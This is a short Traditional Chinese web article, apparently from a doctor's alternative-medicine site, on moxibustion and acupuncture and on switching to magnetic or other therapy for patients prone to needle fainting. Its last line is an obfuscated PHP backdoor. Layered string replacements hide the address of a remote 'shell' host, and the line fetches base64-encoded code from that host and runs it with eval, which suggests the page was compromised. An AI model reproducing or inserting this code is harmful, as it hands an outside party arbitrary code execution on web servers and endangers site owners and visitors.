收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 針灸施行變通之道
針灸施行變通之道 列印 E-mail
       「灸」原本是用艾絨(以艾葉的纖維製成,燃火用)或其他藥物放在身體表面的穴道處燒灼或熨炙,藉熱力將藥效透過肌膚、滲透入經絡的一種治療方式。

因中國古代臨床上經常將「針法」與「灸法」合併使用,便合稱為「針灸」;然而現今台灣所稱「針灸」,係以針法為主,灸為輔。

        針灸雖可收立即之效,但對於極度緊張、害怕針刺疼痛以及特別虛弱的患者,若擔心在扎針過程中突覺身體不適,也許頭暈眼花、臉色蒼白、手腳冰冷……甚至暈厥等暈針狀況,則應視情況改用磁療或其他療法為之。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));